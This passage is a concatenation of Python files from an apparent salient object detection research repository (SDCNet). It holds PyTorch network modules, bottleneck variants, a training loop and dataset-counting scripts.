nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 2, kernel_size=1)
)
self.pre2 = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 2, kernel_size=1)
)
self.pre1 = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 2, kernel_size=1)
)
self.reducex_1 = nn.Sequential(
nn.Conv2d(256 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reducex_2 = nn.Sequential(
nn.Conv2d(512 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reducex_3 = nn.Sequential(
nn.Conv2d(1024 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
for m in self.modules():
if isinstance(m, nn.ReLU) or isinstance(m, nn.Dropout):
m.inplace = True
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.fc0 = nn.Sequential(
nn.BatchNorm1d(256),
nn.Dropout(0.5),
nn.Linear(256, num_classes),
)
def forward(self, x, c):
layer0 = self.layer0(x)
layer1 = self.layer1(layer0)
layer2 = self.layer2(layer1)
layer3 = self.layer3(layer2)
layer4 = self.layer4(layer3)
l0_size = layer0.size()[2:]
l1_size = layer1.size()[2:]
l2_size = layer2.size()[2:]
l3_size = layer3.size()[2:]
F1 = self.reducex(layer4)
p4 = self.pre4(F1)
p4 = F.interpolate(p4, size=x.size()[2:], mode='bilinear', align_corners=True)
F0_4 = F.interpolate(F1, size=l3_size, mode='bilinear', align_corners=True)
F0_3 = self.reducex_3(torch.cat((F0_4, layer3), 1))
p3 = self.pre3(F0_3)
p3 = F.interpolate(p3, size=x.size()[2:], mode='bilinear', align_corners=True)
F0_3 = F.interpolate(F0_3, size=l2_size, mode='bilinear', align_corners=True)
F0_2 = self.reducex_2(torch.cat((F0_3, layer2), 1))
p2 = self.pre2(F0_2)
p2 = F.interpolate(p2, size=x.size()[2:], mode='bilinear', align_corners=True)
F0_2 = F.interpolate(F0_2, size=l1_size, mode='bilinear', align_corners=True)
F0_1 = self.reducex_1(torch.cat((F0_2, layer1), 1))
p1 = self.pre1(F0_1)
p1 = F.interpolate(p1, size=x.size()[2:], mode='bilinear', align_corners=True)
p5 = p4 + p3 + p2 + p1
        # saliency detection branch
predict1 = self.predict1(F1)
predict1 = F.interpolate(predict1, size=l3_size, mode='bilinear', align_corners=True)
F1 = F.interpolate(F1, size=l3_size, mode='bilinear', align_corners=True)
F2 = F1[:, :, :, :].clone().detach()
for i in range(len(c)):
if c[i] == 0:
F2[i, :, :, :] = self.reduce3_0(
torch.cat((F1[i, :, :, :].unsqueeze(0), layer3[i, :, :, :].unsqueeze(0)), 1))
elif c[i] == 1:
F2[i, :, :, :] = self.reduce3_1(
torch.cat((F1[i, :, :, :].unsqueeze(0), layer3[i, :, :, :].unsqueeze(0)), 1))
elif c[i] == 2:
F2[i, :, :, :] = self.reduce3_2(
torch.cat((F1[i, :, :, :].unsqueeze(0), layer3[i, :, :, :].unsqueeze(0)), 1))
elif c[i] == 3:
F2[i, :, :, :] = self.reduce3_3(
torch.cat((F1[i, :, :, :].unsqueeze(0), layer3[i, :, :, :].unsqueeze(0)), 1))
elif c[i] == 4:
F2[i, :, :, :] = self.reduce3_4(
torch.cat((F1[i, :, :, :].unsqueeze(0), layer3[i, :, :, :].unsqueeze(0)), 1))
predict2 = self.predict2(F2) + predict1
predict2 = F.interpolate(predict2, size=l2_size, mode='bilinear', align_corners=True)
F2 = F.interpolate(F2, size=l2_size, mode='bilinear', align_corners=True)
F3 = F2[:, :, :, :].clone().detach()
for i in range(len(c)):
if c[i] == 0:
F3[i, :, :, :] = self.reduce2_0(
torch.cat((F2[i, :, :, :].unsqueeze(0), layer2[i, :, :, :].unsqueeze(0)), 1))
elif c[i] == 1:
F3[i, :, :, :] = self.reduce2_1(
torch.cat((F2[i, :, :, :].unsqueeze(0), layer2[i, :, :, :].unsqueeze(0)), 1))
elif c[i] == 2:
F3[i, :, :, :] = self.reduce2_2(
torch.cat((F2[i, :, :, :].unsqueeze(0), layer2[i, :, :, :].unsqueeze(0)), 1))
elif c[i] == 3:
F3[i, :, :, :] = self.reduce2_3(
torch.cat((F2[i, :, :, :].unsqueeze(0), layer2[i, :, :, :].unsqueeze(0)), 1))
elif c[i] == 4:
F3[i, :, :, :] = self.reduce2_4(
torch.cat((F2[i, :, :, :].unsqueeze(0), layer2[i, :, :, :].unsqueeze(0)), 1))
predict3 = self.predict3(F3) + predict2
predict3 = F.interpolate(predict3, size=l1_size, mode='bilinear', align_corners=True)
F3 = F.interpolate(F3, size=l1_size, mode='bilinear', align_corners=True)
F4 = F3[:, :, :, :].clone().detach()
for i in range(len(c)):
if c[i] == 0:
F4[i, :, :, :] = self.reduce1_0(
torch.cat((F3[i, :, :, :].unsqueeze(0), layer1[i, :, :, :].unsqueeze(0)), 1))
elif c[i] == 1:
F4[i, :, :, :] = self.reduce1_1(
torch.cat((F3[i, :, :, :].unsqueeze(0), layer1[i, :, :, :].unsqueeze(0)), 1))
elif c[i] == 2:
F4[i, :, :, :] = self.reduce1_2(
torch.cat((F3[i, :, :, :].unsqueeze(0), layer1[i, :, :, :].unsqueeze(0)), 1))
elif c[i] == 3:
F4[i, :, :, :] = self.reduce1_3(
torch.cat((F3[i, :, :, :].unsqueeze(0), layer1[i, :, :, :].unsqueeze(0)), 1))
elif c[i] == 4:
F4[i, :, :, :] = self.reduce1_4(
torch.cat((F3[i, :, :, :].unsqueeze(0), layer1[i, :, :, :].unsqueeze(0)), 1))
predict4 = self.predict4(F4) + predict3
F5 = self.reduce5(torch.cat((F4, layer0), 1))
predict5 = self.predict5(F5) + predict4
F0 = F4[:, :, :, :].clone().detach()
for i in range(len(c)):
if c[i] == 0:
F0[i, :, :, :] = self.reduce0_0(layer0[i, :, :, :].unsqueeze(0))
elif c[i] == 1:
F0[i, :, :, :] = self.reduce0_1(layer0[i, :, :, :].unsqueeze(0))
elif c[i] == 2:
F0[i, :, :, :] = self.reduce0_2(layer0[i, :, :, :].unsqueeze(0))
elif c[i] == 3:
F0[i, :, :, :] = self.reduce0_3(layer0[i, :, :, :].unsqueeze(0))
elif c[i] == 4:
F0[i, :, :, :] = self.reduce0_4(layer0[i, :, :, :].unsqueeze(0))
F1 = F.interpolate(F1, size=l1_size, mode='bilinear', align_corners=True)
F2 = F.interpolate(F2, size=l1_size, mode='bilinear', align_corners=True)
F6 = self.reduce6(torch.cat((F0, F5), 1))
F7 = self.reduce7(torch.cat((F0, F4), 1))
F8 = self.reduce8(torch.cat((F0, F3), 1))
F9 = self.reduce9(torch.cat((F0, F2), 1))
F10 = self.reduce10(torch.cat((F0, F1), 1))
predict6 = self.predict6(F6) + predict5
predict7 = self.predict7(F7) + predict6
predict8 = self.predict8(F8) + predict7
predict9 = self.predict9(F9) + predict8
predict10 = self.predict10(F10) + predict9
predict11 = predict6 + predict7 + predict8 + predict9 + predict10
predict1 = F.interpolate(predict1, size=x.size()[2:], mode='bilinear', align_corners=True)
predict2 = F.interpolate(predict2, size=x.size()[2:], mode='bilinear', align_corners=True)
predict3 = F.interpolate(predict3, size=x.size()[2:], mode='bilinear', align_corners=True)
predict4 = F.interpolate(predict4, size=x.size()[2:], mode='bilinear', align_corners=True)
predict5 = F.interpolate(predict5, size=x.size()[2:], mode='bilinear', align_corners=True)
predict6 = F.interpolate(predict6, size=x.size()[2:], mode='bilinear', align_corners=True)
predict7 = F.interpolate(predict7, size=x.size()[2:], mode='bilinear', align_corners=True)
predict8 = F.interpolate(predict8, size=x.size()[2:], mode='bilinear', align_corners=True)
predict9 = F.interpolate(predict9, size=x.size()[2:], mode='bilinear', align_corners=True)
predict10 = F.interpolate(predict10, size=x.size()[2:], mode='bilinear', align_corners=True)
predict11 = F.interpolate(predict11, size=x.size()[2:], mode='bilinear', align_corners=True)
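        # Deep supervision: during training every side output (p1-p5, predict1-predict11)
        # is returned so each can receive its own loss term (see SDCNet.py); at inference
        # only the fused map predict11 is returned, squashed to [0, 1] by the sigmoid.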
if self.training:
return p5, p4, p3, p2, p1, predict1, predict2, predict3, predict4, predict5, predict6, predict7, predict8, predict9, predict10, predict11
return F.sigmoid(predict11)
#----------------------------------------------------------------------------------------
class _ASPP(nn.Module):
def __init__(self, in_dim):
super(_ASPP, self).__init__()
down_dim = in_dim // 2
self.conv1 = nn.Sequential(
nn.Conv2d(in_dim, down_dim, kernel_size=1), nn.BatchNorm2d(down_dim), nn.PReLU()
)
self.conv2 = nn.Sequential(
nn.Conv2d(in_dim, down_dim, kernel_size=3, dilation=2, padding=2), nn.BatchNorm2d(down_dim), nn.PReLU()
)
self.conv3 = nn.Sequential(
nn.Conv2d(in_dim, down_dim, kernel_size=3, dilation=4, padding=4), nn.BatchNorm2d(down_dim), nn.PReLU()
)
self.conv4 = nn.Sequential(
nn.Conv2d(in_dim, down_dim, kernel_size=3, dilation=6, padding=6), nn.BatchNorm2d(down_dim), nn.PReLU()
)
self.conv5 = nn.Sequential(
nn.Conv2d(in_dim, down_dim, kernel_size=1), nn.BatchNorm2d(down_dim), nn.PReLU()
)
self.fuse = nn.Sequential(
nn.Conv2d(5 * down_dim, in_dim, kernel_size=1), nn.BatchNorm2d(in_dim), nn.PReLU()
)
def forward(self, x):
conv1 = self.conv1(x)
conv2 = self.conv2(x)
conv3 = self.conv3(x)
conv4 = self.conv4(x)
conv5 = F.interpolate(self.conv5(F.adaptive_avg_pool2d(x, 1)), size=x.size()[2:], mode='bilinear',
align_corners=True)
return self.fuse(torch.cat((conv1, conv2, conv3, conv4, conv5), 1))
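# --- Hedged usage sketch (not part of the original file) ---
# Minimal check of the _ASPP block defined above; the batch size, channel count and
# spatial size below are illustrative assumptions only. torch is assumed to be
# imported at the top of this module (it is already used above).
if __name__ == '__main__':
    aspp = _ASPP(in_dim=2048)
    dummy = torch.randn(2, 2048, 16, 16)
    out = aspp(dummy)
    # the fused output keeps the input channel count and spatial size
    print(out.shape)  # expected: torch.Size([2, 2048, 16, 16])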
|
Python
| 529
| 52.631378
| 149
|
/model.py
| 0.556625
| 0.46396
|
Sssssbo/SDCNet
|
refs/heads/master
|
import numpy as np
import os
import torch
from PIL import Image
from torch.autograd import Variable
from torchvision import transforms
from torch.utils.data import DataLoader
import matplotlib.pyplot as plt
import pandas as pd
from tqdm import tqdm
import cv2
from config import ecssd_path, hkuis_path, pascals_path, sod_path, dutomron_path, MTDD_test_path
from misc import check_mkdir, crf_refine, AvgMeter, cal_precision_recall_mae, cal_fmeasure
from datasets import TestFolder_joint
import joint_transforms
from model import HSNet_single1, HSNet_single1_ASPP, HSNet_single1_NR, HSNet_single2, SDMS_A, SDMS_C
torch.manual_seed(2018)
# set which gpu to use
torch.cuda.set_device(0)
ckpt_path = './ckpt'
test_path = './test_ECSSD.csv'
def main():
img = np.zeros((512, 512),dtype = np.uint8)
img2 = cv2.imread('./0595.PNG', 0)
cv2.imshow('img',img2)
#cv2.waitKey(0)
print(img, img2)
Image.fromarray(img).save('./free.png')
if __name__ == '__main__':
main()
|
Python
| 41
| 24.024391
| 100
|
/create_free.py
| 0.719298
| 0.691033
|
Sssssbo/SDCNet
|
refs/heads/master
|
import numpy as np
import os
import torch
from PIL import Image
from torch.autograd import Variable
from torchvision import transforms
from torch.utils.data import DataLoader
import matplotlib.pyplot as plt
import pandas as pd
from tqdm import tqdm
path_list = ['msra10k', 'ECSSD', 'DUT-OMROM', 'DUTS-TR', 'DUTS-TE', 'HKU-IS', 'PASCAL-S', 'SED2', 'SOC', 'SOD', 'THUR-15K']
def main():
Dataset, Class0, Class1, Class2, Class3, Class4, Class5, Class6, Class7, Class8, Class9, Class10, Total = [], [], [], [], [], [], [], [], [], [], [], [], []
for data_path in path_list:
test_path = './SOD_label/label_' + data_path + '.csv'
        print('Evaluate for ' + test_path)
test_data = pd.read_csv(test_path)
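        # each label CSV is expected to provide 'img_path', 'gt_path' and 'label' columns,
        # with 'label' being an integer class id in the range 0-10 (counted below)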
imgs = []
num, c0, c1, c2, c3, c4, c5, c6, c7, c8, c9, c10 = 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
for index, row in test_data.iterrows():
imgs.append((row['img_path'], row['gt_path'], row['label']))
img_path, gt_path, label = imgs[index]
if label == 0:
c0 += 1
elif label == 1:
c1 += 1
elif label == 2:
c2 += 1
elif label == 3:
c3 += 1
elif label == 4:
c4 += 1
elif label == 5:
c5 += 1
elif label == 6:
c6 += 1
elif label == 7:
c7 += 1
elif label == 8:
c8 += 1
elif label == 9:
c9 += 1
elif label == 10:
c10 += 1
num += 1
print('[Class0 %.f], [Class1 %.f], [Class2 %.f], [Class3 %.f]\n'\
'[Class4 %.f], [Class5 %.f], [Class6 %.f], [Class7 %.f]\n'\
'[Class8 %.f], [Class9 %.f], [Class10 %.f], [Total %.f]\n'%\
(c0, c1, c2, c3, c4, c5, c6, c7, c8, c9, c10, num)
)
Dataset.append(data_path)
Class0.append(c0)
Class1.append(c1)
Class2.append(c2)
Class3.append(c3)
Class4.append(c4)
Class5.append(c5)
Class6.append(c6)
Class7.append(c7)
Class8.append(c8)
Class9.append(c9)
Class10.append(c10)
Total.append(num)
label_file = pd.DataFrame({'Datasets': Dataset, 'Class 0': Class0, 'Class 1': Class1, 'Class 2': Class2, 'Class 3': Class3, 'Class 4': Class4, 'Class 5': Class5, 'Class 6': Class6, 'Class 7': Class7, 'Class 8': Class8, 'Class 9': Class9, 'Class 10': Class10, 'Num of Pic': Total})
label_file = label_file[['Datasets', 'Class 0', 'Class 1', 'Class 2', 'Class 3', 'Class 4', 'Class 5', 'Class 6', 'Class 7', 'Class 8', 'Class 9', 'Class 10', 'Num of Pic']]
label_file.to_csv('./Dataset_statistics.csv', index=False)
if __name__ == '__main__':
main()
|
Python
| 75
| 36.813332
| 284
|
/count_dataset.py
| 0.492595
| 0.435825
|
Sssssbo/SDCNet
|
refs/heads/master
|
import datetime
import os
import time
import torch
from torch import nn
from torch import optim
from torch.autograd import Variable
from torch.utils.data import DataLoader
from torchvision import transforms
import pandas as pd
import numpy as np
import joint_transforms
from config import msra10k_path, MTDD_train_path
from datasets import ImageFolder_joint
from misc import AvgMeter, check_mkdir, cal_sc
from model import R3Net, SDCNet
from torch.backends import cudnn
cudnn.benchmark = True
torch.manual_seed(2021)
torch.cuda.set_device(6)
csv_path = './label_DUTS-TR.csv'
ckpt_path = './ckpt'
exp_name ='SDCNet'
args = {
'iter_num': 30000,
'train_batch_size': 16,
'last_iter': 0,
'lr': 1e-3,
'lr_decay': 0.9,
'weight_decay': 5e-4,
'momentum': 0.9,
'snapshot': ''
}
joint_transform = joint_transforms.Compose([
joint_transforms.RandomCrop(300),
joint_transforms.RandomHorizontallyFlip(),
joint_transforms.RandomRotate(10)
])
img_transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
target_transform = transforms.ToTensor()
to_pil = transforms.ToPILImage()
all_data = pd.read_csv(csv_path)
train_set = ImageFolder_joint(all_data, joint_transform, img_transform, target_transform)
train_loader = DataLoader(train_set, batch_size=args['train_batch_size'], num_workers=0, shuffle=True, drop_last=True)#
log_path = os.path.join(ckpt_path, exp_name, str(datetime.datetime.now()) + '.txt')
def main():
net = SDCNet(num_classes = 5).cuda().train() #
print('training in ' + exp_name)
optimizer = optim.SGD([
{'params': [param for name, param in net.named_parameters() if name[-4:] == 'bias'],
'lr': 2 * args['lr']},
{'params': [param for name, param in net.named_parameters() if name[-4:] != 'bias'],
'lr': args['lr'], 'weight_decay': args['weight_decay']}
], momentum=args['momentum'])
if len(args['snapshot']) > 0:
print('training resumes from ' + args['snapshot'])
net.load_state_dict(torch.load(os.path.join(ckpt_path, exp_name, args['snapshot'] + '.pth')))
optimizer.load_state_dict(torch.load(os.path.join(ckpt_path, exp_name, args['snapshot'] + '_optim.pth')))
optimizer.param_groups[0]['lr'] = 2 * args['lr']
optimizer.param_groups[1]['lr'] = args['lr']
check_mkdir(ckpt_path)
check_mkdir(os.path.join(ckpt_path, exp_name))
open(log_path, 'w').write(str(args) + '\n\n')
train(net, optimizer)
def train(net, optimizer):
start_time = time.time()
curr_iter = args['last_iter']
num_class = [0, 0, 0, 0, 0]
while True:
total_loss_record, loss0_record, loss1_record, loss2_record = AvgMeter(), AvgMeter(), AvgMeter(), AvgMeter()
batch_time = AvgMeter()
end = time.time()
        print('-----beginning the first stage, train_mode==0-----')
for i, data in enumerate(train_loader):
optimizer.param_groups[0]['lr'] = 2 * args['lr'] * (1 - float(curr_iter) / args['iter_num']
) ** args['lr_decay']
optimizer.param_groups[1]['lr'] = args['lr'] * (1 - float(curr_iter) / args['iter_num']
) ** args['lr_decay']
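            # "poly" learning-rate schedule: lr_t = base_lr * (1 - t / iter_num) ** lr_decay,
            # with the bias parameter group (param_groups[0]) kept at twice the base rate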
inputs, gt, labels = data
print(labels)
# depends on the num of classes
cweight = torch.tensor([0.5, 0.75, 1, 1.25, 1.5])
#weight = torch.ones(size=gt.shape)
weight = gt.clone().detach()
sizec = labels.numpy()
#ta = np.zeros(shape=gt.shape)
'''
np.zeros(shape=labels.shape)
sc = gt.clone().detach()
for i in range(len(sizec)):
gta = np.array(to_pil(sc[i,:].data.squeeze(0).cpu()))#
#print(gta.shape)
labels[i] = cal_sc(gta)
sizec[i] = labels[i]
print(labels)
'''
batch_size = inputs.size(0)
inputs = Variable(inputs).cuda()
gt = Variable(gt).cuda()
labels = Variable(labels).cuda()
#print(sizec.shape)
optimizer.zero_grad()
p5, p4, p3, p2, p1, predict1, predict2, predict3, predict4, predict5, predict6, predict7, predict8, predict9, predict10, predict11 = net(inputs, sizec) # mode=1
criterion = nn.BCEWithLogitsLoss().cuda()
criterion2 = nn.CrossEntropyLoss().cuda()
gt2 = gt.long()
gt2 = gt2.squeeze(1)
l5 = criterion2(p5, gt2)
l4 = criterion2(p4, gt2)
l3 = criterion2(p3, gt2)
l2 = criterion2(p2, gt2)
l1 = criterion2(p1, gt2)
loss0 = criterion(predict11, gt)
loss10 = criterion(predict10, gt)
loss9 = criterion(predict9, gt)
loss8 = criterion(predict8, gt)
loss7 = criterion(predict7, gt)
loss6 = criterion(predict6, gt)
loss5 = criterion(predict5, gt)
loss4 = criterion(predict4, gt)
loss3 = criterion(predict3, gt)
loss2 = criterion(predict2, gt)
loss1 = criterion(predict1, gt)
total_loss = l1 + l2 + l3 + l4 + l5 + loss0 + loss1 + loss2 + loss3 + loss4 + loss5 + loss6 + loss7 + loss8 + loss9 + loss10
total_loss.backward()
optimizer.step()
total_loss_record.update(total_loss.item(), batch_size)
loss1_record.update(l5.item(), batch_size)
loss0_record.update(loss0.item(), batch_size)
curr_iter += 1.0
batch_time.update(time.time() - end)
end = time.time()
log = '[iter %d], [R1/Mode0], [total loss %.5f]\n' \
'[l5 %.5f], [loss0 %.5f]\n' \
'[lr %.13f], [time %.4f]' % \
(curr_iter, total_loss_record.avg, loss1_record.avg, loss0_record.avg, optimizer.param_groups[1]['lr'],
batch_time.avg)
print(log)
print('Num of class:', num_class)
open(log_path, 'a').write(log + '\n')
if curr_iter == args['iter_num']:
torch.save(net.state_dict(), os.path.join(ckpt_path, exp_name, '%d.pth' % curr_iter))
torch.save(optimizer.state_dict(),
os.path.join(ckpt_path, exp_name, '%d_optim.pth' % curr_iter))
total_time = time.time() - start_time
print(total_time)
return
if __name__ == '__main__':
main()
|
Python
| 184
| 35.255436
| 172
|
/SDCNet.py
| 0.558087
| 0.529006
|
Sssssbo/SDCNet
|
refs/heads/master
|
import math
import torch
from torch import nn
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm2d(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class GDN_Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(GDN_Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1_0 = nn.BatchNorm2d(
planes, affine=False, track_running_stats=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2_0 = nn.BatchNorm2d(
planes, affine=False, track_running_stats=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.bn3_0 = nn.BatchNorm2d(
planes * 4, affine=False, track_running_stats=False)
self.bn3 = nn.BatchNorm2d(planes * 4)
self.in1 = nn.InstanceNorm2d(planes)
self.in2 = nn.InstanceNorm2d(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out1 = torch.zeros_like(out)
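        # During training the affine-free BN (bn1_0) is applied separately to each
        # sub-batch of 8 samples ([:8], [8:16], [16:]), so every chunk is normalised
        # with its own batch statistics; at test time InstanceNorm is used instead.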
if self.training == True:
#print("training with gdn block")
out1[:8] = self.bn1_0(out[:8])
out1[8:16] = self.bn1_0(out[8:16])
out1[16:] = self.bn1_0(out[16:])
else:
#print("test for gdn block")
out1 = self.in1(out)
out = self.bn1(out1)
out = self.relu(out)
out = self.conv2(out)
out1 = torch.zeros_like(out)
if self.training == True:
out1[:8] = self.bn2_0(out[:8])
out1[8:16] = self.bn2_0(out[8:16])
out1[16:] = self.bn2_0(out[16:])
else:
out1 = self.in1(out)
out = self.bn2(out1)
out = self.relu(out)
out = self.conv3(out)
out1 = torch.zeros_like(out)
if self.training == True:
out1[:8] = self.bn3_0(out[:8])
out1[8:16] = self.bn3_0(out[8:16])
out1[16:] = self.bn3_0(out[16:])
else:
out1 = self.in2(out)
out = self.bn3(out1)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class IN_Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(IN_Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.in1_0 = nn.InstanceNorm2d(planes)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.in2_0 = nn.InstanceNorm2d(planes)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.in3_0 = nn.InstanceNorm2d(planes * 4)
self.bn3 = nn.BatchNorm2d(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.in1_0(out)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.in2_0(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.in3_0(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class IN2_Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(IN2_Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.in1_0 = nn.InstanceNorm2d(planes)
self.conv1_1 = nn.Sequential(
nn.Conv2d(planes * 2, planes, kernel_size=3, padding=1, bias=False), nn.BatchNorm2d(planes), nn.ReLU(inplace=True)
)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.in2_0 = nn.InstanceNorm2d(planes)
self.conv2_1 = nn.Sequential(
nn.Conv2d(planes * 2, planes, kernel_size=3, padding=1, bias=False), nn.BatchNorm2d(planes), nn.ReLU(inplace=True)
)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.in3_0 = nn.InstanceNorm2d(planes * 4)
self.conv3_1 = nn.Sequential(
nn.Conv2d(planes * 8, planes * 4, kernel_size=1, bias=False), nn.BatchNorm2d(planes * 4)
)
self.bn3 = nn.BatchNorm2d(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
x1 = self.conv1(x)
out1 = self.in1_0(x1)
out1 = self.bn1(out1)
out1 = self.relu(out1)
x1 = self.conv1_1(torch.cat((out1,x1),1))
x2 = self.conv2(x1)
out2 = self.in2_0(x2)
out2 = self.bn2(out2)
out2 = self.relu(out2)
x2 = self.conv2_1(torch.cat((out2,x2),1))
x3 = self.conv3(x2)
out3 = self.in3_0(x3)
out3 = self.bn3(out3)
out3 = self.relu(out3)
x3 = self.conv3_1(torch.cat((out3,x3),1))
if self.downsample is not None:
residual = self.downsample(residual)
x3 += residual
x3 = self.relu(x3)
return x3
class SNR_Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(SNR_Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.in1_0 = nn.InstanceNorm2d(planes)
self.conv1_1 = nn.Conv2d(planes, planes, kernel_size=3,
padding=1, bias=False)
self.bn1_1 = nn.BatchNorm2d(planes)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.in2_0 = nn.InstanceNorm2d(planes)
self.conv2_1 = nn.Conv2d(planes, planes, kernel_size=3,
padding=1, bias=False)
self.bn2_1 = nn.BatchNorm2d(planes)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.in3_0 = nn.InstanceNorm2d(planes * 4)
self.bn3 = nn.BatchNorm2d(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
x1 = self.conv1(x)
out1 = self.in1_0(x1)
res1 = x1 - out1
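        # res1 holds what instance normalisation stripped from the feature (roughly the
        # "style" component); it is re-encoded by conv1_1/bn1_1 and added back to the
        # normalised feature below, which appears to be the restitution step the SNR
        # naming refers to.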
res1 = self.conv1_1(res1)
res1 = self.bn1_1(res1)
res1 = self.relu(res1)
x1 = self.bn1(x1)
x1 = out1 + res1
x1 = self.relu(x1)
x2 = self.conv2(x1)
out2 = self.in2_0(x2)
res2 = x2 - out2
res2 = self.conv2_1(res2)
res2 = self.bn2_1(res2)
res2 = self.relu(res2)
x2 = self.bn2(x2)
x2 = out2 + res2
x2 = self.relu(x2)
x3 = self.conv3(x2)
x3 = self.bn3(x3)
if self.downsample is not None:
residual = self.downsample(residual)
x3 += residual
x3 = self.relu(x3)
return x3
class SNR2_Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(SNR2_Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.in1_0 = nn.InstanceNorm2d(planes)
self.conv1_1 = nn.Conv2d(planes, planes, kernel_size=3,
padding=1, bias=False)
self.bn1_1 = nn.BatchNorm2d(planes)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
